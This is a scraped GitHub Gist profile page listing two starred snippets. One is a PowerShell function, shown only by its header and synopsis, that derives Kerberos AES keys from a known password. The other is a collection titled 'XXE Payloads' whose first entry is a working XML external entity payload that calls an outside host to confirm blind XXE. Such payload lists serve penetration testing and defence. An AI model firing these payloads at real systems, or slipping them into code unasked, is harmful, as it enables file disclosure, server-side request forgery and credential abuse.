Skip to content

Instantly share code, notes, and snippets.

View ThePacketBender's full-sized avatar
💭
PoC || kindly see myself out while everyone is..hey look a giraffe=!>

Name ThePacketBender

💭
PoC || kindly see myself out while everyone is..hey look a giraffe=!>
View GitHub Profile
@Kevin-Robertson
Kevin-Robertson / Get-KerberosAESKey.ps1
Last active April 11, 2024 19:37
Generate Kerberos AES keys from a known password
function Get-KerberosAESKey
{
<#
.SYNOPSIS
Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The
results have been verified against the test values in RFC3962, MS-KILE, and my own test lab.
https://tools.ietf.org/html/rfc3962
https://msdn.microsoft.com/library/cc233855.aspx
@staaldraad
staaldraad / XXE_payloads
Last active April 7, 2024 14:26
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>